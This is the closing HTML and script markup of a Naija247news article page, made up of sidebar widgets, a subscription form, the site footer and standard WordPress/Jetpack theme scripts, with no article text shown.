block_td_uid_74_5e2cc0f950aae.atts = '{"limit":3,"sort":"popular","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"POPULAR POSTS","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_74_5e2cc0f950aae_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_74_5e2cc0f950aae_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_74_5e2cc0f950aae.td_column_number = "1";
block_td_uid_74_5e2cc0f950aae.block_type = "td_block_7";
block_td_uid_74_5e2cc0f950aae.post_count = "3";
block_td_uid_74_5e2cc0f950aae.found_posts = "102035";
block_td_uid_74_5e2cc0f950aae.header_color = "";
block_td_uid_74_5e2cc0f950aae.ajax_pagination_infinite_stop = "";
block_td_uid_74_5e2cc0f950aae.max_num_pages = "34012";
tdBlocksArray.push(block_td_uid_74_5e2cc0f950aae);
</script><div class="td-block-title-wrap"><h4 class="block-title"><span>POPULAR POSTS</span></h4></div><div id=td_uid_74_5e2cc0f950aae class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://naija247news.com/2017/03/20/firstbank-photo-story-africa-ceo-forum/" rel="bookmark" title="FirstBank Photo Story &#8211; Africa CEO Forum"><img width="100" height="70" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2017/03/African-CEO-Forum1.jpg?resize=100%2C70&ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2017/03/African-CEO-Forum1.jpg?resize=100%2C70&#038;ssl=1 100w, https://i0.wp.com/naija247news.com/wp-content/uploads/2017/03/African-CEO-Forum1.jpg?resize=200%2C140&#038;ssl=1 200w" sizes="(-webkit-min-device-pixel-ratio: 2) 200px, (min-resolution: 192dpi) 200px, 100px" alt="" title="FirstBank Photo Story &#8211; Africa CEO Forum"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2017/03/20/firstbank-photo-story-africa-ceo-forum/" rel="bookmark" title="FirstBank Photo Story &#8211; Africa CEO Forum">FirstBank Photo Story &#8211; Africa CEO Forum</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-03-20T17:38:59+00:00" >Mar 20, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://naija247news.com/2019/05/24/3-stages-of-hiv-infection-that-you-need-to-be-aware-of/" rel="bookmark" title="3 stages of HIV infection that you need to be aware of"><img width="100" height="70" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2018/11/hiv-aids-myths-and-facts-s1-photo-of-blood-vessel-interior-with-hiv.jpg?resize=100%2C70&ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2018/11/hiv-aids-myths-and-facts-s1-photo-of-blood-vessel-interior-with-hiv.jpg?resize=100%2C70&#038;ssl=1 100w, https://i0.wp.com/naija247news.com/wp-content/uploads/2018/11/hiv-aids-myths-and-facts-s1-photo-of-blood-vessel-interior-with-hiv.jpg?resize=200%2C140&#038;ssl=1 200w" sizes="(-webkit-min-device-pixel-ratio: 2) 200px, (min-resolution: 192dpi) 200px, 100px" alt="" title="3 stages of HIV infection that you need to be aware of"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2019/05/24/3-stages-of-hiv-infection-that-you-need-to-be-aware-of/" rel="bookmark" title="3 stages of HIV infection that you need to be aware of">3 stages of HIV infection that you need to be aware...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-05-24T05:48:41+00:00" >May 24, 2019</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://naija247news.com/2018/12/31/exclusive-how-isa-funtua-fraudulently-acquired-keystone-bank-and-9mobile-using-amcon-md/" rel="bookmark" title="EXCLUSIVE: How Isa Funtua fraudulently acquired KeyStone Bank and 9Mobile using AMCON MD"><img width="100" height="70" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2018/12/Ismailia-Funtua1.jpg?resize=100%2C70&ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2018/12/Ismailia-Funtua1.jpg?resize=100%2C70&#038;ssl=1 100w, https://i1.wp.com/naija247news.com/wp-content/uploads/2018/12/Ismailia-Funtua1.jpg?resize=200%2C140&#038;ssl=1 200w" sizes="(-webkit-min-device-pixel-ratio: 2) 200px, (min-resolution: 192dpi) 200px, 100px" alt="" title="EXCLUSIVE: How Isa Funtua fraudulently acquired KeyStone Bank and 9Mobile using AMCON MD"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2018/12/31/exclusive-how-isa-funtua-fraudulently-acquired-keystone-bank-and-9mobile-using-amcon-md/" rel="bookmark" title="EXCLUSIVE: How Isa Funtua fraudulently acquired KeyStone Bank and 9Mobile using AMCON MD">EXCLUSIVE: How Isa Funtua fraudulently acquired KeyStone Bank and 9Mobile using...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-12-31T11:02:56+00:00" >Dec 31, 2018</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->                <aside class="widget widget_blog_subscription jetpack_subscription_widget"><div class="block-title"><span>Subscribe to Naija247news via Email</span></div>
            <form action="#" method="post" accept-charset="utf-8" id="subscribe-blog-blog_subscription-2">
				                    <div id="subscribe-text"><p>Enter your email address to subscribe to this blog and receive notifications of new posts by email.</p>
</div>                    <p id="subscribe-email">
                        <label id="jetpack-subscribe-label"
                               class="screen-reader-text"
                               for="subscribe-field-blog_subscription-2">
							Email Address                        </label>
                        <input type="email" name="email" required="required" class="required"
                               value=""
                               id="subscribe-field-blog_subscription-2"
                               placeholder="Email Address"/>
                    </p>

                    <p id="subscribe-submit">
                        <input type="hidden" name="action" value="subscribe"/>
                        <input type="hidden" name="source" value="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/"/>
                        <input type="hidden" name="sub-type" value="widget"/>
                        <input type="hidden" name="redirect_fragment" value="blog_subscription-2"/>
						                        <button type="submit"
	                        		                    	                        name="jetpack_subscriptions_widget"
	                    >
	                        Subscribe                        </button>
                    </p>
				            </form>
		
</aside>            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_popular_categories td_uid_75_5e2cc0fa3bbe0_rand widget widget_categories td-pb-border-top"  data-td-block-uid="td_uid_75_5e2cc0fa3bbe0" ><h4 class="block-title"><span>POPULAR CATEGORY</span></h4><ul class="td-pb-padding-side"><li><a href="https://naija247news.com/category/top-news/">Top News<span class="td-cat-no">2726</span></a></li><li><a href="https://naija247news.com/category/politics/">Politics<span class="td-cat-no">2091</span></a></li><li><a href="https://naija247news.com/category/politics/nigeria2019/">Nigeria2019<span class="td-cat-no">1303</span></a></li><li><a href="https://naija247news.com/category/oil-energy/news/">News<span class="td-cat-no">1234</span></a></li><li><a href="https://naija247news.com/category/politics/nigeria2019/apc-news/">APC News<span class="td-cat-no">972</span></a></li><li><a href="https://naija247news.com/category/business/news-business/">News<span class="td-cat-no">923</span></a></li><li><a href="https://naija247news.com/category/world/africa/investing-africa/">Investing<span class="td-cat-no">687</span></a></li><li><a href="https://naija247news.com/category/world/africa/politics-africa/">Politics<span class="td-cat-no">683</span></a></li></ul></div> <!-- ./block -->                <aside class="widget widget_text">			<div class="textwidget"><script type='text/javascript'>
(function(){
  var spoutjs=document.createElement('script'),firstjs=document.getElementsByTagName('script')[0];
  spoutjs.async=1;
  spoutjs.src='//cdn.spoutable.com/0266dab1-0e22-45d1-ab04-85a9540d2d4a/spoutable.js';
  firstjs.parentNode.insertBefore(spoutjs,firstjs)
})();
</script>
</div>
		</aside>            </div>
        </div>
    </div>
    <div class="td-footer-bottom-full">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="https://naija247news.com/"><img class="td-retina-data" src="http://naija247news.com/wp-content/uploads/2018/12/Naija247newslogo.jpg" data-retina="http://naija247news.com/wp-content/uploads/2018/12/Naija247newslogo2.jpg" alt=" Tracking Investigative Reports on Nigerian Economy ..." title=""/></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div>Naija247news.com is an investigative news platform that tracks news on Nigerian Economy, Business, Politics, Financial and Africa and Global Economy. 

<div class="footer-email-wrap">Contact us: <a href="mailto:Editor@Naija247news.com">Editor@Naija247news.com</a></div></aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/naija247news/" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/naija247news/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.linkedin.com/company/naija247news" title="Linkedin">
                <i class="td-icon-font td-icon-linkedin"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://godwin12345.tumblr.com/" title="Path">
                <i class="td-icon-font td-icon-path"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://feeds.feedburner.com/naija247news/ASsy" title="RSS">
                <i class="td-icon-font td-icon-rss"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://godwin12345.tumblr.com/" title="Tumblr">
                <i class="td-icon-font td-icon-tumblr"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/naija247new" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span></aside></div>            </div>
        </div>
    </div>
</div>

<!-- Sub Footer -->
    <div class="td-sub-footer-container">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span7 td-sub-footer-menu">
                        <div class="menu-footer-container"><ul id="menu-footer" class="td-subfooter-menu"><li id="menu-item-212650" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-212650"><a href="https://naija247news.com/about-us/">About Us</a></li>
<li id="menu-item-212649" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-212649"><a href="https://naija247news.com/advertise-with-us/">Advertise with us</a></li>
<li id="menu-item-212654" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-212654"><a href="https://naija247news.com/our-private-policy/">Our Private Policy</a></li>
<li id="menu-item-230817" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-230817"><a href="https://naija247news.com/contact-us-3/">Contact Us</a></li>
<li id="menu-item-230815" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-230815"><a href="https://naija247news.com/sitemap/">https://naija247news.com/sitemap.xml</a></li>
</ul></div>                </div>

                <div class="td-pb-span5 td-sub-footer-copy">
                    &copy; Naija247news Media Limited                </div>
            </div>
        </div>
    </div>
</div><!--close td-outer-wrap-->

	<div style="display:none">
	</div>
                <div class="td-more-articles-box">
                    <i class="td-icon-close td-close-more-articles-box"></i>
                    <span class="td-more-articles-box-title">MORE STORIES</span>
                    <div class="td-content-more-articles-box">

                    
        <div class="td_module_1 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2019/08/27/the-fulani-of-nigeria-b-y-femi-fani-kayode/" rel="bookmark" title="The Fulani Of Nigeria B y Femi Fani-Kayode"><img width="324" height="160" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2019/08/Femi-Fani-Kayode-3.jpg?resize=324%2C160&ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2019/08/Femi-Fani-Kayode-3.jpg?resize=324%2C160&#038;ssl=1 324w, https://i1.wp.com/naija247news.com/wp-content/uploads/2019/08/Femi-Fani-Kayode-3.jpg?resize=500%2C320&#038;ssl=1 648w" sizes="(-webkit-min-device-pixel-ratio: 2) 648px, (min-resolution: 192dpi) 648px, 324px" alt="" title="The Fulani Of Nigeria B y Femi Fani-Kayode"/></a></div>                <a href="https://naija247news.com/category/thebackpage/africanism/" class="td-post-category">Africanism</a>            </div>
            <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2019/08/27/the-fulani-of-nigeria-b-y-femi-fani-kayode/" rel="bookmark" title="The Fulani Of Nigeria B y Femi Fani-Kayode">The Fulani Of Nigeria B y Femi Fani-Kayode</a></h3>
            <div class="td-module-meta-info">
                <span class="td-post-author-name"><a href="https://naija247news.com/author/247news/">Naija247news Media</a> <span>-</span> </span>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-08-27T15:54:41+00:00" >Aug 27, 2019</time></span>                <div class="td-module-comments"><a href="https://naija247news.com/2019/08/27/the-fulani-of-nigeria-b-y-femi-fani-kayode/#respond">0</a></div>            </div>

            
        </div>

        
        <div class="td_module_1 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2018/08/22/how-not-to-assess-lagos-under-ambode-by-niyi-anibaba/" rel="bookmark" title="How not to assess Lagos under Ambode By Niyi Anibaba"><img width="324" height="160" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2018/04/ambode-akinwunmi-lagos-state-governor-530x320.jpg?resize=324%2C160&ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2018/04/ambode-akinwunmi-lagos-state-governor-530x320.jpg?resize=324%2C160&#038;ssl=1 324w, https://i0.wp.com/naija247news.com/wp-content/uploads/2018/04/ambode-akinwunmi-lagos-state-governor-530x320.jpg?resize=500%2C302&#038;ssl=1 648w" sizes="(-webkit-min-device-pixel-ratio: 2) 648px, (min-resolution: 192dpi) 648px, 324px" alt="" title="How not to assess Lagos under Ambode By Niyi Anibaba"/></a></div>                <a href="https://naija247news.com/category/thebackpage/africanism/" class="td-post-category">Africanism</a>            </div>
            <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2018/08/22/how-not-to-assess-lagos-under-ambode-by-niyi-anibaba/" rel="bookmark" title="How not to assess Lagos under Ambode By Niyi Anibaba">How not to assess Lagos under Ambode By Niyi Anibaba</a></h3>
            <div class="td-module-meta-info">
                <span class="td-post-author-name"><a href="https://naija247news.com/author/247news/">Naija247news Media</a> <span>-</span> </span>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-22T02:25:02+00:00" >Aug 22, 2018</time></span>                <div class="td-module-comments"><a href="https://naija247news.com/2018/08/22/how-not-to-assess-lagos-under-ambode-by-niyi-anibaba/#respond">0</a></div>            </div>

            
        </div>

                            </div>
                </div>

    <!--

        Theme: Newspaper by tagDiv 2016
        Version: 7.6 (rara)
        Deploy mode: deploy
        
        uid: 5e2cc0fa43725
    -->

    <div class="td-container"><meta name="yandex-verification" content="9b42f3633098159b" /></div>
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/naija247news.com\/2020\/01\/25\/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa\/":311820};
	</script>
				<script type='text/javascript' src='https://c0.wp.com/p/jetpack/8.1.1/_inc/build/photon/photon.min.js'></script>
<script type='text/javascript' src='https://naija247news.com/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=7.6'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.3.2/wp-includes/js/comment-reply.min.js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.3.2/wp-includes/js/wp-embed.min.js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/8.1.1/_inc/build/postmessage.min.js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/8.1.1/_inc/build/jquery.jetpack-resize.min.js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/8.1.1/_inc/build/likes/queuehandler.min.js'></script>
<script async="async" type='text/javascript' src='https://naija247news.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wp_google_translate_widget = {"lang":"en_ZA","layout":"0"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/8.1.1/_inc/build/widgets/google-translate/google-translate.min.js'></script>
<script type='text/javascript' src='//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit&#038;ver=5.3.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/8.1.1/_inc/build/sharedaddy/sharing.min.js'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
</script>
	<iframe src='https://widgets.wp.com/likes/master.html?ver=202004#ver=202004&amp;lang=en-za' scrolling='no' id='likes-master' name='likes-master' style='display:none;'></iframe>
	<div id='likes-other-gravatars'><div class="likes-text"><span>%d</span> bloggers like this:</div><ul class="wpl-avatars sd-like-gravatars"></ul></div>
	
<!-- JS generated by theme -->

<script>
    

			
				jQuery().ready(function () {
					tdWeather.addItem({"block_uid":"td_top_weather_uid","location":"Lagos, South Africa and New York","api_location":"Lagos","api_language":"en","today_icon":"broken-clouds-n","today_icon_text":"broken clouds","today_temp":[22.699999999999999289457264239899814128875732421875,72.7999999999999971578290569595992565155029296875],"today_humidity":62,"today_wind_speed":[1.3000000000000000444089209850062616169452667236328125,0.8000000000000000444089209850062616169452667236328125],"today_min":[22.699999999999999289457264239899814128875732421875,72.7999999999999971578290569595992565155029296875],"today_max":[22.699999999999999289457264239899814128875732421875,72.7999999999999971578290569595992565155029296875],"today_clouds":71,"current_unit":0,"forecast":[{"timestamp":1580036400,"day_temp":[33,91],"day_name":"Sun","owm_day_index":1},{"timestamp":1580122800,"day_temp":[34,93],"day_name":"Mon","owm_day_index":2},{"timestamp":1580209200,"day_temp":[31,88],"day_name":"Tue","owm_day_index":3},{"timestamp":1580295600,"day_temp":[32,89],"day_name":"Wed","owm_day_index":4},{"timestamp":1580382000,"day_temp":[32,90],"day_name":"Thu","owm_day_index":5}],"api_key":"5f0e41b16ad3752a1ccb886bceb5ed51"});
				});
			
			

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'https://naija247news.com/wp-content/themes/Newspaper/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'https://naija247news.com/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>


		<!--[if IE]>
		<script type="text/javascript">
			if ( 0 === window.location.hash.indexOf( '#comment-' ) ) {
				// window.location.reload() doesn't respect the Hash in IE
				window.location.hash = window.location.hash;
			}
		</script>
		<![endif]-->
		<script type="text/javascript">
			(function () {
				var comm_par_el = document.getElementById( 'comment_parent' ),
					comm_par = ( comm_par_el && comm_par_el.value ) ? comm_par_el.value : '',
					frame = document.getElementById( 'jetpack_remote_comment' ),
					tellFrameNewParent;

				tellFrameNewParent = function () {
					if ( comm_par ) {
						frame.src = "https://jetpack.wordpress.com/jetpack-comment/?blogid=122485731&postid=311820&comment_registration=0&require_name_email=1&stc_enabled=1&stb_enabled=1&show_avatars=0&avatar_default=mystery&greeting=Leave+a+Reply&greeting_reply=Leave+a+Reply+to+%25s&color_scheme=light&lang=en_ZA&jetpack_version=8.1.1&show_cookie_consent=10&has_cookie_consent=0&token_key=%3Bnormal%3B&sig=171fd285c69759e84758036c62774eb9ed444a6e#parent=https%3A%2F%2Fnaija247news.com%2F2020%2F01%2F25%2Fthe-real-amotekun-is-yet-ahead-by-bunmi-makinwa%2F" + '&replytocom=' + parseInt( comm_par, 10 ).toString();
					} else {
						frame.src = "https://jetpack.wordpress.com/jetpack-comment/?blogid=122485731&postid=311820&comment_registration=0&require_name_email=1&stc_enabled=1&stb_enabled=1&show_avatars=0&avatar_default=mystery&greeting=Leave+a+Reply&greeting_reply=Leave+a+Reply+to+%25s&color_scheme=light&lang=en_ZA&jetpack_version=8.1.1&show_cookie_consent=10&has_cookie_consent=0&token_key=%3Bnormal%3B&sig=171fd285c69759e84758036c62774eb9ed444a6e#parent=https%3A%2F%2Fnaija247news.com%2F2020%2F01%2F25%2Fthe-real-amotekun-is-yet-ahead-by-bunmi-makinwa%2F";
					}
				};

				
				if ( 'undefined' !== typeof addComment ) {
					addComment._Jetpack_moveForm = addComment.moveForm;

					addComment.moveForm = function ( commId, parentId, respondId, postId ) {
						var returnValue = addComment._Jetpack_moveForm( commId, parentId, respondId, postId ),
							cancelClick, cancel;

						if ( false === returnValue ) {
							cancel = document.getElementById( 'cancel-comment-reply-link' );
							cancelClick = cancel.onclick;
							cancel.onclick = function () {
								var cancelReturn = cancelClick.call( this );
								if ( false !== cancelReturn ) {
									return cancelReturn;
								}

								if ( ! comm_par ) {
									return cancelReturn;
								}

								comm_par = 0;

								tellFrameNewParent();

								return cancelReturn;
							};
						}

						if ( comm_par == parentId ) {
							return returnValue;
						}

						comm_par = parentId;

						tellFrameNewParent();

						return returnValue;
					};
				}

				
				// Do the post message bit after the dom has loaded.
				document.addEventListener( 'DOMContentLoaded', function () {
					var iframe_url = "https:\/\/jetpack.wordpress.com";
					if ( window.postMessage ) {
						if ( document.addEventListener ) {
							window.addEventListener( 'message', function ( event ) {
								var origin = event.origin.replace( /^http:\/\//i, 'https://' );
								if ( iframe_url.replace( /^http:\/\//i, 'https://' ) !== origin ) {
									return;
								}
								jQuery( frame ).height( event.data );
							});
						} else if ( document.attachEvent ) {
							window.attachEvent( 'message', function ( event ) {
								var origin = event.origin.replace( /^http:\/\//i, 'https://' );
								if ( iframe_url.replace( /^http:\/\//i, 'https://' ) !== origin ) {
									return;
								}
								jQuery( frame ).height( event.data );
							});
						}
					}
				})

			})();
		</script>

		<script type='text/javascript' src='https://stats.wp.com/e-202004.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:8.1.1',blog:'122485731',post:'311820',tz:'1',srv:'naija247news.com'} ]);
	_stq.push([ 'clickTrackerInit', '122485731', '311820' ]);
</script>

</body>
</html>